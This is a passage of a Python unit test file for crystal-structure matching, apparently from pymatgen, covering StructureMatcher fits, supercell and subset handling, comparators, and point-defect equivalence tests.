list(sm._get_supercells(s2, s1, 8, True))\n for x in scs:\n self.assertAlmostEqual(abs(np.linalg.det(x[3])), 8)\n self.assertEqual(len(x[0]), 24)\n self.assertEqual(len(x[1]), 4)\n self.assertEqual(len(scs), 48)\n\n def test_fit(self):\n \"\"\"\n Take two known matched structures\n 1) Ensure match\n 2) Ensure match after translation and rotations\n 3) Ensure no-match after large site translation\n 4) Ensure match after site shuffling\n \"\"\"\n sm = StructureMatcher()\n\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n # Test rotational/translational invariance\n op = SymmOp.from_axis_angle_and_translation([0, 0, 1], 30, False,\n np.array([0.4, 0.7, 0.9]))\n self.struct_list[1].apply_operation(op)\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n # Test failure under large atomic translation\n self.struct_list[1].translate_sites([0], [.4, .4, .2],\n frac_coords=True)\n self.assertFalse(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n self.struct_list[1].translate_sites([0], [-.4, -.4, -.2],\n frac_coords=True)\n # random.shuffle(editor._sites)\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n # Test FrameworkComporator\n sm2 = StructureMatcher(comparator=FrameworkComparator())\n lfp = self.get_structure(\"LiFePO4\")\n nfp = self.get_structure(\"NaFePO4\")\n self.assertTrue(sm2.fit(lfp, nfp))\n self.assertFalse(sm.fit(lfp, nfp))\n\n # Test anonymous fit.\n self.assertEqual(sm.fit_anonymous(lfp, nfp), True)\n self.assertAlmostEqual(sm.get_rms_anonymous(lfp, nfp)[0],\n 0.060895871160262717)\n\n # Test partial occupancies.\n s1 = Structure(Lattice.cubic(3),\n [{\"Fe\": 0.5}, {\"Fe\": 0.5}, {\"Fe\": 0.5}, {\"Fe\": 0.5}],\n [[0, 0, 0], [0.25, 0.25, 0.25],\n [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]])\n s2 = Structure(Lattice.cubic(3),\n [{\"Fe\": 0.25}, {\"Fe\": 0.5}, {\"Fe\": 0.5}, {\"Fe\": 0.75}],\n [[0, 0, 0], [0.25, 0.25, 0.25],\n [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]])\n self.assertFalse(sm.fit(s1, s2))\n self.assertFalse(sm.fit(s2, s1))\n s2 = Structure(Lattice.cubic(3),\n [{\"Mn\": 0.5}, {\"Mn\": 0.5}, {\"Mn\": 0.5},\n {\"Mn\": 0.5}],\n [[0, 0, 0], [0.25, 0.25, 0.25],\n [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]])\n self.assertEqual(sm.fit_anonymous(s1, s2), True)\n\n self.assertAlmostEqual(sm.get_rms_anonymous(s1, s2)[0], 0)\n\n def test_oxi(self):\n \"\"\"Test oxidation state removal matching\"\"\"\n sm = StructureMatcher()\n self.assertFalse(sm.fit(self.oxi_structs[0], self.oxi_structs[1]))\n sm = StructureMatcher(comparator=ElementComparator())\n 
self.assertTrue(sm.fit(self.oxi_structs[0], self.oxi_structs[1]))\n\n def test_primitive(self):\n \"\"\"Test primitive cell reduction\"\"\"\n sm = StructureMatcher(primitive_cell=True)\n self.struct_list[1].make_supercell([[2, 0, 0], [0, 3, 0], [0, 0, 1]])\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n def test_class(self):\n # Tests entire class as single working unit\n sm = StructureMatcher()\n # Test group_structures and find_indices\n out = sm.group_structures(self.struct_list)\n self.assertEqual(list(map(len, out)), [4, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1])\n self.assertEqual(sum(map(len, out)), len(self.struct_list))\n for s in self.struct_list[::2]:\n s.replace_species({'Ti': 'Zr', 'O': 'Ti'})\n out = sm.group_structures(self.struct_list, anonymous=True)\n self.assertEqual(list(map(len, out)), [4, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1])\n\n def test_mix(self):\n structures = [self.get_structure(\"Li2O\"),\n self.get_structure(\"Li2O2\"),\n self.get_structure(\"LiFePO4\")]\n for fname in [\"POSCAR.Li2O\", \"POSCAR.LiFePO4\"]:\n structures.append(\n Structure.from_file(os.path.join(test_dir, fname)))\n sm = StructureMatcher(comparator=ElementComparator())\n groups = sm.group_structures(structures)\n for g in groups:\n formula = g[0].composition.reduced_formula\n if formula in [\"Li2O\", \"LiFePO4\"]:\n self.assertEqual(len(g), 2)\n else:\n self.assertEqual(len(g), 1)\n\n def test_left_handed_lattice(self):\n \"\"\"Ensure Left handed lattices are accepted\"\"\"\n sm = StructureMatcher()\n s = Structure.from_file(os.path.join(test_dir, \"Li3GaPCO7.json\"))\n self.assertTrue(sm.fit(s, s))\n\n def test_as_dict_and_from_dict(self):\n sm = StructureMatcher(ltol=0.1, stol=0.2, angle_tol=2,\n primitive_cell=False, scale=False,\n comparator=FrameworkComparator())\n d = sm.as_dict()\n sm2 = StructureMatcher.from_dict(d)\n self.assertEqual(sm2.as_dict(), d)\n\n def test_no_scaling(self):\n sm = StructureMatcher(ltol=0.1, stol=0.1, angle_tol=2,\n scale=False, comparator=ElementComparator())\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n self.assertTrue(sm.get_rms_dist(self.struct_list[0],\n self.struct_list[1])[0] < 0.0008)\n\n def test_supercell_fit(self):\n sm = StructureMatcher(attempt_supercell=False)\n s1 = Structure.from_file(os.path.join(test_dir, \"Al3F9.json\"))\n s2 = Structure.from_file(os.path.join(test_dir, \"Al3F9_distorted.json\"))\n\n self.assertFalse(sm.fit(s1, s2))\n\n sm = StructureMatcher(attempt_supercell=True)\n\n self.assertTrue(sm.fit(s1, s2))\n self.assertTrue(sm.fit(s2, s1))\n\n def test_get_lattices(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=True, scale=True,\n attempt_supercell=False)\n l1 = Lattice.from_lengths_and_angles([1, 2.1, 1.9], [90, 89, 91])\n l2 = Lattice.from_lengths_and_angles([1.1, 2, 2], [89, 91, 90])\n s1 = Structure(l1, [], [])\n s2 = Structure(l2, [], [])\n\n lattices = list(sm._get_lattices(s=s1, target_lattice=s2.lattice))\n self.assertEqual(len(lattices), 16)\n\n l3 = Lattice.from_lengths_and_angles([1.1, 2, 20], [89, 91, 90])\n s3 = Structure(l3, [], [])\n\n lattices = list(sm._get_lattices(s=s1, target_lattice=s3.lattice))\n self.assertEqual(len(lattices), 0)\n\n def test_find_match1(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=True, scale=True,\n attempt_supercell=False)\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, 
0], [0, 0.1, -0.95], [.7, .5, .375]])\n\n s1, s2, fu, s1_supercell = sm._preprocess(s1, s2, False)\n match = sm._strict_match(s1, s2, fu, s1_supercell=True, use_rms=True,\n break_on_match=False)\n scale_matrix = match[2]\n s2.make_supercell(scale_matrix)\n fc = s2.frac_coords + match[3]\n fc -= np.round(fc)\n self.assertAlmostEqual(np.sum(fc), 0.9)\n self.assertAlmostEqual(np.sum(fc[:, :2]), 0.1)\n cart_dist = np.sum(match[1] * (l.volume / 3) ** (1 / 3))\n self.assertAlmostEqual(cart_dist, 0.15)\n\n def test_find_match2(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=True, scale=True,\n attempt_supercell=False)\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Si', 'Si'], [[0, 0, 0.1], [0, 0, 0.2]])\n s2 = Structure(l, ['Si', 'Si'], [[0, 0.1, 0], [0, 0.1, -0.95]])\n\n s1, s2, fu, s1_supercell = sm._preprocess(s1, s2, False)\n\n match = sm._strict_match(s1, s2, fu, s1_supercell=False,\n use_rms=True, break_on_match=False)\n scale_matrix = match[2]\n s2.make_supercell(scale_matrix)\n s2.translate_sites(range(len(s2)), match[3])\n\n self.assertAlmostEqual(np.sum(s2.frac_coords) % 1, 0.3)\n self.assertAlmostEqual(np.sum(s2.frac_coords[:, :2]) % 1, 0)\n\n def test_supercell_subsets(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True, allow_subset=True,\n supercell_size='volume')\n sm_no_s = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True, allow_subset=False,\n supercell_size='volume')\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Ag', 'Si', 'Si'],\n [[.7, .4, .5], [0, 0, 0.1], [0, 0, 0.2]])\n s1.make_supercell([2, 1, 1])\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, -0.95], [0, 0.1, 0], [-.7, .5, .375]])\n\n shuffle = [0, 2, 1, 3, 4, 5]\n s1 = Structure.from_sites([s1[i] for i in shuffle])\n\n # test when s1 is exact supercell of s2\n result = sm.get_s2_like_s1(s1, s2)\n for a, b in zip(s1, result):\n self.assertTrue(a.distance(b) < 0.08)\n self.assertEqual(a.species, b.species)\n\n self.assertTrue(sm.fit(s1, s2))\n self.assertTrue(sm.fit(s2, s1))\n self.assertTrue(sm_no_s.fit(s1, s2))\n self.assertTrue(sm_no_s.fit(s2, s1))\n\n rms = (0.048604032430991401, 0.059527539448807391)\n self.assertTrue(np.allclose(sm.get_rms_dist(s1, s2), rms))\n self.assertTrue(np.allclose(sm.get_rms_dist(s2, s1), rms))\n\n # test when the supercell is a subset of s2\n subset_supercell = s1.copy()\n del subset_supercell[0]\n result = sm.get_s2_like_s1(subset_supercell, s2)\n self.assertEqual(len(result), 6)\n for a, b in zip(subset_supercell, result):\n self.assertTrue(a.distance(b) < 0.08)\n self.assertEqual(a.species, b.species)\n\n self.assertTrue(sm.fit(subset_supercell, s2))\n self.assertTrue(sm.fit(s2, subset_supercell))\n self.assertFalse(sm_no_s.fit(subset_supercell, s2))\n self.assertFalse(sm_no_s.fit(s2, subset_supercell))\n\n rms = (0.053243049896333279, 0.059527539448807336)\n self.assertTrue(np.allclose(sm.get_rms_dist(subset_supercell, s2), rms))\n self.assertTrue(np.allclose(sm.get_rms_dist(s2, subset_supercell), rms))\n\n # test when s2 (once made a supercell) is a subset of s1\n s2_missing_site = s2.copy()\n del s2_missing_site[1]\n result = sm.get_s2_like_s1(s1, s2_missing_site)\n for a, b in zip((s1[i] for i in (0, 2, 4, 5)), result):\n self.assertTrue(a.distance(b) < 0.08)\n self.assertEqual(a.species, b.species)\n\n self.assertTrue(sm.fit(s1, s2_missing_site))\n self.assertTrue(sm.fit(s2_missing_site, 
s1))\n self.assertFalse(sm_no_s.fit(s1, s2_missing_site))\n self.assertFalse(sm_no_s.fit(s2_missing_site, s1))\n\n rms = (0.029763769724403633, 0.029763769724403987)\n self.assertTrue(np.allclose(sm.get_rms_dist(s1, s2_missing_site), rms))\n self.assertTrue(np.allclose(sm.get_rms_dist(s2_missing_site, s1), rms))\n\n def test_get_s2_large_s2(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=False,\n attempt_supercell=True, allow_subset=False,\n supercell_size='volume')\n\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Ag', 'Si', 'Si'],\n [[.7, .4, .5], [0, 0, 0.1], [0, 0, 0.2]])\n\n l2 = Lattice.orthorhombic(1.01, 2.01, 3.01)\n s2 = Structure(l2, ['Si', 'Si', 'Ag'],\n [[0, 0.1, -0.95], [0, 0.1, 0], [-.7, .5, .375]])\n s2.make_supercell([[0, -1, 0], [1, 0, 0], [0, 0, 1]])\n\n result = sm.get_s2_like_s1(s1, s2)\n\n for x, y in zip(s1, result):\n self.assertLess(x.distance(y), 0.08)\n\n def test_get_mapping(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=False,\n allow_subset=True)\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Ag', 'Si', 'Si'],\n [[.7, .4, .5], [0, 0, 0.1], [0, 0, 0.2]])\n s1.make_supercell([2, 1, 1])\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, -0.95], [0, 0.1, 0], [-.7, .5, .375]])\n\n shuffle = [2, 0, 1, 3, 5, 4]\n s1 = Structure.from_sites([s1[i] for i in shuffle])\n # test the mapping\n s2.make_supercell([2, 1, 1])\n # equal sizes\n for i, x in enumerate(sm.get_mapping(s1, s2)):\n self.assertEqual(s1[x].species,\n s2[i].species)\n\n del s1[0]\n # s1 is subset of s2\n for i, x in enumerate(sm.get_mapping(s2, s1)):\n self.assertEqual(s1[i].species,\n s2[x].species)\n # s2 is smaller than s1\n del s2[0]\n del s2[1]\n self.assertRaises(ValueError, sm.get_mapping, s2, s1)\n\n def test_get_supercell_matrix(self):\n sm = StructureMatcher(ltol=0.1, stol=0.3, angle_tol=2,\n primitive_cell=False, scale=True,\n attempt_supercell=True)\n\n l = Lattice.orthorhombic(1, 2, 3)\n\n s1 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s1.make_supercell([2, 1, 1])\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, 0], [0, 0.1, -0.95], [-.7, .5, .375]])\n result = sm.get_supercell_matrix(s1, s2)\n self.assertTrue((result == [[-2, 0, 0], [0, 1, 0], [0, 0, 1]]).all())\n\n s1 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s1.make_supercell([[1, -1, 0], [0, 0, -1], [0, 1, 0]])\n\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, 0], [0, 0.1, -0.95], [-.7, .5, .375]])\n result = sm.get_supercell_matrix(s1, s2)\n self.assertTrue((result == [[-1, -1, 0], [0, 0, -1], [0, 1, 0]]).all())\n\n # test when the supercell is a subset\n sm = StructureMatcher(ltol=0.1, stol=0.3, angle_tol=2,\n primitive_cell=False, scale=True,\n attempt_supercell=True, allow_subset=True)\n del s1[0]\n result = sm.get_supercell_matrix(s1, s2)\n self.assertTrue((result == [[-1, -1, 0], [0, 0, -1], [0, 1, 0]]).all())\n\n def test_subset(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=False,\n allow_subset=True)\n l = Lattice.orthorhombic(10, 20, 30)\n s1 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Ag'],\n [[0, 0.1, 0], [-.7, .5, .4]])\n result = sm.get_s2_like_s1(s1, s2)\n\n self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords,\n [0, 0, 0.1])), 1)\n 
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords,\n [0.7, 0.4, 0.5])), 1)\n\n # test with fewer species in s2\n s1 = Structure(l, ['Si', 'Ag', 'Si'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Si'],\n [[0, 0.1, 0], [-.7, .5, .4]])\n result = sm.get_s2_like_s1(s1, s2)\n mindists = np.min(s1.lattice.get_all_distances(\n s1.frac_coords, result.frac_coords), axis=0)\n self.assertLess(np.max(mindists), 1e-6)\n\n self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords,\n [0, 0, 0.1])), 1)\n self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords,\n [0.7, 0.4, 0.5])), 1)\n\n # test with not enough sites in s1\n # test with fewer species in s2\n s1 = Structure(l, ['Si', 'Ag', 'Cl'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Si'],\n [[0, 0.1, 0], [-.7, .5, .4]])\n self.assertEqual(sm.get_s2_like_s1(s1, s2), None)\n\n def test_out_of_cell_s2_like_s1(self):\n l = Lattice.cubic(5)\n s1 = Structure(l, ['Si', 'Ag', 'Si'],\n [[0, 0, -0.02], [0, 0, 0.001], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Ag', 'Si'],\n [[0, 0, 0.98], [0, 0, 0.99], [.7, .4, .5]])\n new_s2 = StructureMatcher(primitive_cell=False).get_s2_like_s1(s1, s2)\n dists = np.sum((s1.cart_coords - new_s2.cart_coords) ** 2,\n axis=-1) ** 0.5\n self.assertLess(np.max(dists), 0.1)\n\n def test_disordered_primitive_to_ordered_supercell(self):\n sm_atoms = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_atoms',\n comparator=OrderDisorderElementComparator())\n sm_sites = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_sites',\n comparator=OrderDisorderElementComparator())\n lp = Lattice.orthorhombic(10, 20, 30)\n pcoords = [[0, 0, 0],\n [0.5, 0.5, 0.5]]\n ls = Lattice.orthorhombic(20, 20, 30)\n scoords = [[0, 0, 0],\n [0.75, 0.5, 0.5]]\n prim = Structure(lp, [{'Na': 0.5}, {'Cl': 0.5}], pcoords)\n supercell = Structure(ls, ['Na', 'Cl'], scoords)\n supercell.make_supercell([[-1, 1, 0], [0, 1, 1], [1, 0, 0]])\n\n self.assertFalse(sm_sites.fit(prim, supercell))\n self.assertTrue(sm_atoms.fit(prim, supercell))\n\n self.assertRaises(ValueError, sm_atoms.get_s2_like_s1, prim, supercell)\n self.assertEqual(len(sm_atoms.get_s2_like_s1(supercell, prim)), 4)\n\n def test_ordered_primitive_to_disordered_supercell(self):\n sm_atoms = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_atoms',\n comparator=OrderDisorderElementComparator())\n sm_sites = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_sites',\n comparator=OrderDisorderElementComparator())\n lp = Lattice.orthorhombic(10, 20, 30)\n pcoords = [[0, 0, 0],\n [0.5, 0.5, 0.5]]\n ls = Lattice.orthorhombic(20, 20, 30)\n scoords = [[0, 0, 0],\n [0.5, 0, 0],\n [0.25, 0.5, 0.5],\n [0.75, 0.5, 0.5]]\n s1 = Structure(lp, ['Na', 'Cl'], pcoords)\n s2 = Structure(ls, [{'Na': 0.5}, {'Na': 0.5}, {'Cl': 0.5}, {'Cl': 0.5}],\n scoords)\n\n self.assertTrue(sm_sites.fit(s1, s2))\n self.assertFalse(sm_atoms.fit(s1, s2))\n\n def test_disordered_to_disordered(self):\n sm_atoms = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=False,\n 
comparator=OrderDisorderElementComparator())\n lp = Lattice.orthorhombic(10, 20, 30)\n coords = [[0., 0., 0.], [0.5, 0.5, 0.5]]\n s1 = Structure(lp, [{'Na': 0.5, \"Cl\": 0.5}, {'Na': 0.5, \"Cl\": 0.5}],\n coords)\n s2 = Structure(lp, [{'Na': 0.5, \"Cl\": 0.5}, {'Na': 0.5, \"Br\": 0.5}],\n coords)\n\n self.assertFalse(sm_atoms.fit(s1, s2))\n\n def test_occupancy_comparator(self):\n\n lp = Lattice.orthorhombic(10, 20, 30)\n pcoords = [[0, 0, 0],\n [0.5, 0.5, 0.5]]\n s1 = Structure(lp, [{'Na': 0.6, 'K': 0.4}, 'Cl'], pcoords)\n s2 = Structure(lp, [{'Xa': 0.4, 'Xb': 0.6}, 'Cl'], pcoords)\n s3 = Structure(lp, [{'Xa': 0.5, 'Xb': 0.5}, 'Cl'], pcoords)\n\n sm_sites = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_sites',\n comparator=OccupancyComparator())\n\n self.assertTrue(sm_sites.fit(s1, s2))\n self.assertFalse(sm_sites.fit(s1, s3))\n\n def test_electronegativity(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5)\n\n s1 = Structure.from_file(os.path.join(test_dir, \"Na2Fe2PAsO4S4.json\"))\n s2 = Structure.from_file(os.path.join(test_dir, \"Na2Fe2PNO4Se4.json\"))\n self.assertEqual(\n sm.get_best_electronegativity_anonymous_mapping(s1, s2),\n {Element('S'): Element('Se'),\n Element('As'): Element('N'),\n Element('Fe'): Element('Fe'),\n Element('Na'): Element('Na'),\n Element('P'): Element('P'),\n Element('O'): Element('O'), })\n self.assertEqual(len(sm.get_all_anonymous_mappings(s1, s2)), 2)\n\n # test include_dist\n dists = {Element('N'): 0, Element('P'): 0.0010725064}\n for mapping, d in sm.get_all_anonymous_mappings(s1, s2,\n include_dist=True):\n self.assertAlmostEqual(dists[mapping[Element('As')]], d)\n\n def test_rms_vs_minimax(self):\n # This tests that structures with adjusted RMS less than stol, but minimax\n # greater than stol are treated properly\n # stol=0.3 gives exactly an ftol of 0.1 on the c axis\n sm = StructureMatcher(ltol=0.2, stol=0.301, angle_tol=1,\n primitive_cell=False)\n l = Lattice.orthorhombic(1, 2, 12)\n\n sp = [\"Si\", \"Si\", \"Al\"]\n s1 = Structure(l, sp, [[0.5, 0, 0], [0, 0, 0], [0, 0, 0.5]])\n s2 = Structure(l, sp, [[0.5, 0, 0], [0, 0, 0], [0, 0, 0.6]])\n self.assertArrayAlmostEqual(sm.get_rms_dist(s1, s2),\n (0.32 ** 0.5 / 2, 0.4))\n\n self.assertEqual(sm.fit(s1, s2), False)\n self.assertEqual(sm.fit_anonymous(s1, s2), False)\n self.assertEqual(sm.get_mapping(s1, s2), None)\n\n\nclass PointDefectComparatorTest(PymatgenTest):\n\n def test_defect_matching(self):\n # SETUP DEFECTS FOR TESTING\n # symmorphic defect test set\n s_struc = Structure.from_file(\n os.path.join(test_dir, \"CsSnI3.cif\")) # tetragonal CsSnI3\n identical_Cs_vacs = [Vacancy(s_struc, s_struc[0]),\n Vacancy(s_struc, s_struc[1])]\n identical_I_vacs_sublattice1 = [Vacancy(s_struc, s_struc[4]),\n Vacancy(s_struc, s_struc[5]),\n Vacancy(s_struc, s_struc[8]),\n Vacancy(s_struc,\n s_struc[9])] # in plane halides\n identical_I_vacs_sublattice2 = [Vacancy(s_struc, s_struc[6]),\n Vacancy(s_struc, s_struc[\n 7])] # out of plane halides\n pdc = PointDefectComparator()\n\n # NOW TEST DEFECTS\n # test vacancy matching\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], identical_Cs_vacs[\n 0])) # trivial vacancy test\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], identical_Cs_vacs[\n 1])) # vacancies on same sublattice\n for i, j in itertools.combinations(range(4), 2):\n self.assertTrue(pdc.are_equal(identical_I_vacs_sublattice1[i],\n identical_I_vacs_sublattice1[j]))\n 
self.assertTrue(pdc.are_equal(identical_I_vacs_sublattice2[0],\n identical_I_vacs_sublattice2[1]))\n self.assertFalse(pdc.are_equal(identical_Cs_vacs[0],\n # both vacancies, but different specie types\n identical_I_vacs_sublattice1[0]))\n self.assertFalse(pdc.are_equal(identical_I_vacs_sublattice1[0],\n # same specie type, different sublattice\n identical_I_vacs_sublattice2[0]))\n\n # test substitutional matching\n sub_Cs_on_I_sublattice1_set1 = PeriodicSite('Cs',\n identical_I_vacs_sublattice1[\n 0].site.frac_coords,\n s_struc.lattice)\n sub_Cs_on_I_sublattice1_set2 = PeriodicSite('Cs',\n identical_I_vacs_sublattice1[\n 1].site.frac_coords,\n s_struc.lattice)\n sub_Cs_on_I_sublattice2 = PeriodicSite('Cs',\n identical_I_vacs_sublattice2[\n 0].site.frac_coords,\n s_struc.lattice)\n sub_Rb_on_I_sublattice2 = PeriodicSite('Rb',\n identical_I_vacs_sublattice2[\n 0].site.frac_coords,\n s_struc.lattice)\n\n self.assertTrue(pdc.are_equal( # trivial substitution test\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set1)\n ))\n\n self.assertTrue(pdc.are_equal( # same sublattice, different coords\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set2)\n ))\n self.assertFalse(pdc.are_equal( # different subs (wrong specie)\n Substitution(s_struc, sub_Cs_on_I_sublattice2),\n Substitution(s_struc, sub_Rb_on_I_sublattice2)\n ))\n self.assertFalse(pdc.are_equal( # different subs (wrong sublattice)\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),\n Substitution(s_struc, sub_Cs_on_I_sublattice2)\n ))\n\n # test symmorphic interstitial matching\n # (using set generated from Voronoi generator, with same sublattice given by saturatated_interstitial_structure function)\n inter_H_sublattice1_set1 = PeriodicSite('H', [0., 0.75, 0.25],\n s_struc.lattice)\n inter_H_sublattice1_set2 = PeriodicSite('H', [0., 0.75, 0.75],\n s_struc.lattice)\n inter_H_sublattice2 = PeriodicSite('H',\n [0.57796112, 0.06923687, 0.56923687],\n s_struc.lattice)\n inter_H_sublattice3 = PeriodicSite('H', [0.25, 0.25, 0.54018268],\n s_struc.lattice)\n inter_He_sublattice3 = PeriodicSite('He', [0.25, 0.25, 0.54018268],\n s_struc.lattice)\n\n self.assertTrue(pdc.are_equal( # trivial interstitial test\n Interstitial(s_struc, inter_H_sublattice1_set1),\n Interstitial(s_struc, inter_H_sublattice1_set1)\n ))\n\n self.assertTrue(pdc.are_equal( # same sublattice, different coords\n Interstitial(s_struc, inter_H_sublattice1_set1),\n Interstitial(s_struc, inter_H_sublattice1_set2)\n ))\n self.assertFalse(\n pdc.are_equal( # different interstitials (wrong sublattice)\n Interstitial(s_struc, inter_H_sublattice1_set1),\n Interstitial(s_struc, inter_H_sublattice2)\n ))\n self.assertFalse(\n pdc.are_equal( # different interstitials (wrong sublattice)\n Interstitial(s_struc, inter_H_sublattice1_set1),\n Interstitial(s_struc, inter_H_sublattice3)\n ))\n self.assertFalse(\n pdc.are_equal( # different interstitials (wrong specie)\n Interstitial(s_struc, inter_H_sublattice3),\n Interstitial(s_struc, inter_He_sublattice3)\n ))\n\n # test non-symmorphic interstitial matching\n # (using set generated from Voronoi generator, with same sublattice given by saturatated_interstitial_structure function)\n ns_struc = Structure.from_file(os.path.join(test_dir, \"CuCl.cif\"))\n ns_inter_H_sublattice1_set1 = PeriodicSite('H', [0.06924513, 0.06308959,\n 0.86766528],\n ns_struc.lattice)\n ns_inter_H_sublattice1_set2 = PeriodicSite('H', [0.43691041, 0.36766528,\n 
0.06924513],\n ns_struc.lattice)\n ns_inter_H_sublattice2 = PeriodicSite('H', [0.06022109, 0.60196031,\n 0.1621814],\n ns_struc.lattice)\n ns_inter_He_sublattice2 = PeriodicSite('He', [0.06022109, 0.60196031,\n 0.1621814],\n ns_struc.lattice)\n\n self.assertTrue(pdc.are_equal( # trivial interstitial test\n Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n Interstitial(ns_struc, ns_inter_H_sublattice1_set1)\n ))\n self.assertTrue(pdc.are_equal( # same sublattice, different coords\n Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n Interstitial(ns_struc, ns_inter_H_sublattice1_set2)\n ))\n self.assertFalse(pdc.are_equal(\n Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n # different interstitials (wrong sublattice)\n Interstitial(ns_struc, ns_inter_H_sublattice2)))\n self.assertFalse(\n pdc.are_equal( # different interstitials (wrong specie)\n Interstitial(ns_struc, ns_inter_H_sublattice2),\n Interstitial(ns_struc, ns_inter_He_sublattice2)\n ))\n\n # test influence of charge on defect matching (default is to be charge agnostic)\n vac_diff_chg = identical_Cs_vacs[0].copy()\n vac_diff_chg.set_charge(3.)\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], vac_diff_chg))\n chargecheck_pdc = PointDefectComparator(\n check_charge=True) # switch to PDC which cares about charge state\n self.assertFalse(\n chargecheck_pdc.are_equal(identical_Cs_vacs[0], vac_diff_chg))\n\n # test different supercell size\n # (comparing same defect but different supercells - default is to not check for this)\n sc_agnostic_pdc = PointDefectComparator(check_primitive_cell=True)\n sc_scaled_s_struc = s_struc.copy()\n sc_scaled_s_struc.make_supercell([2, 2, 3])\n sc_scaled_I_vac_sublatt1_ps1 = PeriodicSite('I',\n identical_I_vacs_sublattice1[\n 0].site.coords,\n sc_scaled_s_struc.lattice,\n coords_are_cartesian=True)\n sc_scaled_I_vac_sublatt1_ps2 = PeriodicSite('I',\n identical_I_vacs_sublattice1[\n 1].site.coords,\n sc_scaled_s_struc.lattice,\n coords_are_cartesian=True)\n sc_scaled_I_vac_sublatt2_ps = PeriodicSite('I',\n identical_I_vacs_sublattice2[\n 1].site.coords,\n sc_scaled_s_struc.lattice,\n coords_are_cartesian=True)\n sc_scaled_I_vac_sublatt1_defect1 = Vacancy(sc_scaled_s_struc,\n sc_scaled_I_vac_sublatt1_ps1)\n sc_scaled_I_vac_sublatt1_defect2 = Vacancy(sc_scaled_s_struc,\n sc_scaled_I_vac_sublatt1_ps2)\n sc_scaled_I_vac_sublatt2_defect = Vacancy(sc_scaled_s_struc,\n sc_scaled_I_vac_sublatt2_ps)\n\n self.assertFalse(\n pdc.are_equal(identical_I_vacs_sublattice1[0],\n # trivially same defect site but between different supercells\n 